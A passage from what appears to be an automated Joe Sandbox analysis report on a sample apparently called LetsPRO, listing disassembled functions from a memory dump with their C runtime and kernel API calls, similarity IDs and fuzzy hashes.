                                        Function 6C95A02C Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C95A045
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95A050
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C95A070
                                        • _localtime64_s.MSVCR100(?,?), ref: 6C95A082
                                          • Part of subcall function 6C916964: _memset.LIBCMT(?,000000FF,00000024), ref: 6C91698D
                                          • Part of subcall function 6C916964: _get_daylight.MSVCR100(?), ref: 6C9169C9
                                          • Part of subcall function 6C916964: _get_dstbias.MSVCR100(?), ref: 6C9169DB
                                          • Part of subcall function 6C916964: _get_timezone.MSVCR100(?), ref: 6C9169ED
                                          • Part of subcall function 6C916964: _gmtime64_s.MSVCR100(?,?), ref: 6C916A21
                                        • _asctime.LIBCMT(?), ref: 6C95A091
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_asctime_get_daylight_get_dstbias_get_timezone_gmtime64_s_invalid_parameter_invalid_parameter_noinfo_localtime64_s_memset
                                        • String ID:
                                        • API String ID: 2020581482-0
                                        • Opcode ID: e21d9b8c349808c3d69a264e4c338ccf44c1e0d0eacdf7c15b48cdde81b60fe2
                                        • Instruction ID: 059f8c82acd171c7fb4550c83c3d795863c0200fd0f1eda609b93866fcfee028
                                        • Opcode Fuzzy Hash: e21d9b8c349808c3d69a264e4c338ccf44c1e0d0eacdf7c15b48cdde81b60fe2
                                        • Instruction Fuzzy Hash: 4BF01931A14208DEDB40DFB5D8447AE37B8AF2A31CF841559C405DBA90EF30D958DB79
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95AF59 Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C95AF72
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95AF7D
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C95AF95
                                        • __localtime32_s.LIBCMT(?,?), ref: 6C95AFA7
                                          • Part of subcall function 6C9596EC: _errno.MSVCR100(?,?,?,?), ref: 6C959708
                                          • Part of subcall function 6C9596EC: _invalid_parameter_noinfo.MSVCR100(?,?,?,?), ref: 6C959712
                                        • __wasctime.LIBCMT(?), ref: 6C95AFB6
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$_invalid_parameter_noinfo$__localtime32_s__wasctime_invalid_parameter
                                        • String ID:
                                        • API String ID: 2302537511-0
                                        • Opcode ID: 2b7f52e6052a463e8f2ede5a8297828755422044e471a7265a10c446bbc6816b
                                        • Instruction ID: 8886f39765e89c3f923bcaa5ab7955306f92236781d7426d96b7e0d473b6b08a
                                        • Opcode Fuzzy Hash: 2b7f52e6052a463e8f2ede5a8297828755422044e471a7265a10c446bbc6816b
                                        • Instruction Fuzzy Hash: 37F090B0608209DFDB00DFA9D840BDE77F8AF29328F900459D800D7A80EF35D9689778
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93BBC1 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C94AB51: CreateThread.KERNEL32(00000000,-00000018,6C940F33,00010000,6C940F21,?), ref: 6C94AB8D
                                          • Part of subcall function 6C94AB51: GetLastError.KERNEL32 ref: 6C94AB97
                                          • Part of subcall function 6C94AB51: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94ABAF
                                          • Part of subcall function 6C94AB51: _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C94ABBD
                                        • GetLastError.KERNEL32 ref: 6C93BBE7
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C93BBFF
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C93BC0D
                                        • SetThreadPriority.KERNEL32(00000000,0000000F), ref: 6C93BC15
                                        • GetLastError.KERNEL32 ref: 6C93BC1F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionThreadThrow$CreatePriority
                                        • String ID:
                                        • API String ID: 3804766065-0
                                        • Opcode ID: 694262616ebfa82e5990553d2fd4635af12deae6b4a1f803e94c5f376e98ebee
                                        • Instruction ID: 1f9c1c629b93cc2d406e279853f94bdd7136f2d926fe882bd83333166a2f570b
                                        • Opcode Fuzzy Hash: 694262616ebfa82e5990553d2fd4635af12deae6b4a1f803e94c5f376e98ebee
                                        • Instruction Fuzzy Hash: 43F0E971F4462262D73066B68C06F9B35BCEF5078CF505834B219E6984FF65D0048298
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A6B5 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __doserrno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C90A6F0
                                        • __doserrno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C93047E
                                        • _errno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C930486
                                        • _errno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C930499
                                        • _invalid_parameter_noinfo.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C9304A4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2315031519-0
                                        • Opcode ID: a075354f652d572f9ffc339d7e7efafcca35d551fd2bbaea65a1c5bb779f3d43
                                        • Instruction ID: 14d0fa9feb9f383864b4f314ebc22555c19a71a73fc5bc804e9f23badaeb309e
                                        • Opcode Fuzzy Hash: a075354f652d572f9ffc339d7e7efafcca35d551fd2bbaea65a1c5bb779f3d43
                                        • Instruction Fuzzy Hash: DCF0B431344284CBD3118FA8D44437D3BB5AF6232DF212288D82C8FED2EFB5D8418AA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C953D74 Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C953D7F
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C953D8A
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C953D9C
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C953DA7
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        • Opcode ID: d01152b93ffb946c4a87cc8516188d92c9589fbbee909d8b9060cf2cd0a3f2a8
                                        • Instruction ID: d7a1d9b85c3381484ffa111eea6d38825694ad0df87b3b8e5cc51bfdb9858f38
                                        • Opcode Fuzzy Hash: d01152b93ffb946c4a87cc8516188d92c9589fbbee909d8b9060cf2cd0a3f2a8
                                        • Instruction Fuzzy Hash: 62F05E356155189ACB249E7898002E93BB4BF61338F508369A5388BAE0CB71C46486A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9400E2 Relevance: 7.5, APIs: 5, Instructions: 32memorythreadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 6C93B79F: __EH_prolog3.LIBCMT ref: 6C93B7A6
                                        • TlsAlloc.KERNEL32 ref: 6C940103
                                        • GetLastError.KERNEL32 ref: 6C940113
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C94012C
                                        • _CxxThrowException.MSVCR100(00000000,6C9A0D48,00000000), ref: 6C94013B
                                        • Concurrency::details::UMSThreadScheduler::OneShotStaticConstruction.LIBCMT ref: 6C940140
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: AllocConcurrency::details::Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorConstructionErrorExceptionH_prolog3LastScheduler::ShotStaticThreadThrow
                                        • String ID:
                                        • API String ID: 3767078539-0
                                        • Opcode ID: 30ce3e7b864bc11dcef9e1452f988b45dc920348c011fd70b183d3261184e693
                                        • Instruction ID: a1f664ec495bc22720f70706fada2709b0841878b27de5e2df9bfff28e989fb8
                                        • Opcode Fuzzy Hash: 30ce3e7b864bc11dcef9e1452f988b45dc920348c011fd70b183d3261184e693
                                        • Instruction Fuzzy Hash: 0EF02E7261415586C7146BB0DC069AF36A8DFA571CF10C73AE43EC2EC0EF38D1049A89
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C8F445D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON
                                        Download Yara Rule
                                        APIs
                                        • __startOneArgErrorHandling.LIBCMT ref: 6C8F44ED
                                          • Part of subcall function 6C918940: __87except.LIBCMT ref: 6C91897B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorHandling__87except__start
                                        • String ID: pow
                                        • API String ID: 2905807303-2276729525
                                        • Opcode ID: df91a44e89781ed53a5c492b160c3a8a2c00a6c51b6076afcbfe1300c66ac46e
                                        • Instruction ID: b1b57a4563e593c7598e2a6c03ab0be75f5e8372327d94774a28d6f41846962a
                                        • Opcode Fuzzy Hash: df91a44e89781ed53a5c492b160c3a8a2c00a6c51b6076afcbfe1300c66ac46e
                                        • Instruction Fuzzy Hash: 9B510D61A0E10996D7216A18D70035E7BF4DBC37DCF304E6BE4F581E94DF39889B8A86
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93CFB1 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 138COMMON
                                        Download Yara Rule
                                        APIs
                                        • ??_U@YAPAXI@Z.MSVCR100(00000000,?,?,00000000,?,00000000), ref: 6C93D0A2
                                        • _memset.LIBCMT(00000000,00000000,?,00000000,?,?,00000000,?,00000000), ref: 6C93D0B5
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _memset
                                        • String ID: $$,
                                        • API String ID: 2102423945-53852779
                                        • Opcode ID: 3f33f42f44a5df6554cf7e201ce0381110e5c704c35c40932dda660aeb690a7a
                                        • Instruction ID: cb59c833fdcea38983fef01c978359861ae75bab3b50fc70286b2edddec19607
                                        • Opcode Fuzzy Hash: 3f33f42f44a5df6554cf7e201ce0381110e5c704c35c40932dda660aeb690a7a
                                        • Instruction Fuzzy Hash: 19419371A00129BFCF11EFA8C894AEEBBB5EF28344F105155E419AB700D735EE55CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90DA55 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • DName::DName.LIBCMT ref: 6C92EFB0
                                        • DName::operator+.LIBCMT ref: 6C92EFB7
                                          • Part of subcall function 6C90DE3B: DName::operator+.LIBCMT ref: 6C90DEF9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID: CV:
                                        • API String ID: 168861036-3725821052
                                        • Opcode ID: 10288518432c56fc929be01f761fda89626bb3c19e0d20f6b1c97e54f6ee0a3c
                                        • Instruction ID: af00132069e949d6693fc8d15a7863020b32557417f6b3c6dc7f59fe24769c5d
                                        • Opcode Fuzzy Hash: 10288518432c56fc929be01f761fda89626bb3c19e0d20f6b1c97e54f6ee0a3c
                                        • Instruction Fuzzy Hash: 0E41DE32B09649DFDF05CFA8D482AAD7BF9EF1A718B244159D052D7B84DB30D842CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C974044 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • ?_inconsistency@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6C974052
                                          • Part of subcall function 6C973954: DecodePointer.KERNEL32(6C973990,00000008,6C9744B7,6C9744D8,0000000C,6C97452F,?,?,00000003,00000000,6C974588,00000008,6C92CB7F,?,00000000,00000003), ref: 6C973966
                                          • Part of subcall function 6C973954: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6C973986
                                        • ?terminate@@YAXXZ.MSVCR100(E06D7363,1FFFFFFF,19930522), ref: 6C974059
                                          • Part of subcall function 6C9738EA: _getptd.MSVCR100(6C973928,00000008,6C97398B,?,00000000,00000003,?), ref: 6C9738F6
                                          • Part of subcall function 6C9738EA: _abort.LIBCMT(6C973928,00000008,6C97398B,?,00000000,00000003,?), ref: 6C973918
                                        • __TypeMatch.MSVCR100(1FFFFFFF,00000000,?,6C932778,00000000,E06D7363,1FFFFFFF,19930522), ref: 6C97408D
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ?terminate@@$?_inconsistency@@DecodeMatchPointerType_abort_getptd
                                        • String ID: csm
                                        • API String ID: 2680980455-1018135373
                                        • Opcode ID: 12dea05cd943bb9ac6101119d5d5e1648a6ead4dd8795de1c94d38c634ece7ce
                                        • Instruction ID: d973a9c5dc69565e4e58a94d99a9258c5a45be1c5fd076b983354f80b213bdba
                                        • Opcode Fuzzy Hash: 12dea05cd943bb9ac6101119d5d5e1648a6ead4dd8795de1c94d38c634ece7ce
                                        • Instruction Fuzzy Hash: 1E112931A05219EFCB20DFA9C488A9DFBB8EF24358F148096EC5497702D731E55ACF62
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904223 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_wcslen
                                        • String ID: I
                                        • API String ID: 3151729805-3707901625
                                        • Opcode ID: d0cb1577a1b6cb274d787ff8986099efa7cb5c2f35358b27240609c7f693e58b
                                        • Instruction ID: 2193a99906f6c9cbc91278dd01c07992fb29171bfd122e1a442b93537bc9bddf
                                        • Opcode Fuzzy Hash: d0cb1577a1b6cb274d787ff8986099efa7cb5c2f35358b27240609c7f693e58b
                                        • Instruction Fuzzy Hash: 97018F72D00209DBCF109FA5D804AEEBAB4AF14328F10461AE434A62D4D779C215CBA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C910573 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_strlen
                                        • String ID: I
                                        • API String ID: 1245117036-3707901625
                                        • Opcode ID: 63b200c80f584c3d6baadd8d99cfcfba1ad4eeedbabd0438baa0be7c01899e17
                                        • Instruction ID: 45be51057fe8c2ff4fb58b4cc20f4255c30d438d53ab09837f18f9924e75f856
                                        • Opcode Fuzzy Hash: 63b200c80f584c3d6baadd8d99cfcfba1ad4eeedbabd0438baa0be7c01899e17
                                        • Instruction Fuzzy Hash: 5801A771D0024D9FDF109FA5C8049EE7B79BF44728F10461AE534A6280D779C1118BA5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C974107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37stringCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974115
                                          • Part of subcall function 6C973954: DecodePointer.KERNEL32(6C973990,00000008,6C9744B7,6C9744D8,0000000C,6C97452F,?,?,00000003,00000000,6C974588,00000008,6C92CB7F,?,00000000,00000003), ref: 6C973966
                                          • Part of subcall function 6C973954: ?terminate@@YAXXZ.MSVCR100(?,00000000,00000003,?), ref: 6C973986
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C974120
                                        • ?_inconsistency@@YAXXZ.MSVCR100(?,00000000,?,00000000,00000000), ref: 6C97414B
                                        • ?raw_name@type_info@@QBEPBDXZ.MSVCR100(0000005E,?,00000000,?,00000000,00000000), ref: 6C974169
                                        • strcmp.MSVCR100(00000000,0000005E,?,00000000,?,00000000,00000000), ref: 6C97416F
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ?_inconsistency@@$?raw_name@type_info@@?terminate@@DecodePointerstrcmp
                                        • String ID: csm
                                        • API String ID: 2672297707-1018135373
                                        • Opcode ID: 0e10fbcdc216a47d976a5216acc1823d21fb8472fe0e0d95f87f5171ea74f30f
                                        • Instruction ID: b65af91378f65103da06fe08403ffe022ac483c27b2ef9d64c69cbaabe3b1929
                                        • Opcode Fuzzy Hash: 0e10fbcdc216a47d976a5216acc1823d21fb8472fe0e0d95f87f5171ea74f30f
                                        • Instruction Fuzzy Hash: A9F0F636503620CB8F30EEA99040459F3BCAE7132932A4509CCB89BF02D730FA499EF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C97EBCC Relevance: 6.3, APIs: 4, Instructions: 279COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C97EBE7
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97EBF2
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • _errno.MSVCR100 ref: 6C97EC0B
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C97EC16
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo$_invalid_parameter
                                        • String ID:
                                        • API String ID: 1328987296-0
                                        • Opcode ID: b77ab0a98d25c9c44e539799136e888a628456343f5ab00da24559e3c8f9b06e
                                        • Instruction ID: 09b28345a005570c17c8c955d56a6fe09006da53eea0211c720c1ccf8be721b1
                                        • Opcode Fuzzy Hash: b77ab0a98d25c9c44e539799136e888a628456343f5ab00da24559e3c8f9b06e
                                        • Instruction Fuzzy Hash: 3FA10135A062598FCB31CF6989805EE7BBAAF9A304F288159EC6497704E630DD51CBF1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C904AC0 Relevance: 6.3, APIs: 4, Instructions: 262COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
